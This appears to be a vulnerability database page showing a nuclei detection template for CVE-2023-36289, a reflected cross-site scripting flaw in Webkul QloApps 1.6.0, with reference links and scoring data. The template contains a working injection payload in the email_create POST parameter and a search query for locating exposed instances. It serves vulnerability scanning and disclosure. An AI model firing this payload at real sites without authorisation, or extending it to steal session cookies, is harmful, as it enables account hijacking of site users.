Lucene search
K

Webkul QloApps 1.6.0 - Cross-site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

Webkul QloApps 1.6.0 - XSS vulnerability allows unauthenticated attacker to obtain user session cooki

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-36289
23 Jun 202315:15
attackerkb
CNNVD
Webkul QloApps 跨站脚本漏洞
23 Jun 202300:00
cnnvd
CVE
CVE-2023-36289
23 Jun 202300:00
cve
Cvelist
CVE-2023-36289
23 Jun 202300:00
cvelist
NVD
CVE-2023-36289
23 Jun 202315:15
nvd
Prion
Cross site scripting
23 Jun 202315:15
prion
Positive Technologies
PT-2023-25514 · Webkul · Webkul Qloapps
23 Jun 202300:00
ptsecurity
Vulnrichment
CVE-2023-36289
23 Jun 202300:00
vulnrichment
id: CVE-2023-36289

info:
  name: Webkul QloApps 1.6.0 - Cross-site Scripting
  author: theamanrawat
  severity: medium
  description: |
    An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor.
  reference:
    - https://github.com/webkul/hotelcommerce
    - https://flashy-lemonade-192.notion.site/Cross-site-scripting-in-POST-Request-via-email_create-and-back-parameter-in-QloApps-1-6-0-e05548203d744daf9047d82fc94b19b7
    - https://nvd.nist.gov/vuln/detail/CVE-2023-36289
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-36289
    cwe-id: CWE-79
    epss-score: 0.01169
    epss-percentile: 0.6357
    cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: webkul
    product: qloapps
    fofa-query: title="qloapps"
  tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul,vuln
variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'onmouseover=alert(document.domain)'
          - 'hasConfirmation'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bb320550186139b5d24191dabc90259f699b07c845b7971ec88742fd341026d60221008cc6243f3c575a574e833b12fe0590b5acb3dc0ccb7ae4e58f6977d73221fd76:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.01169
SSVC
33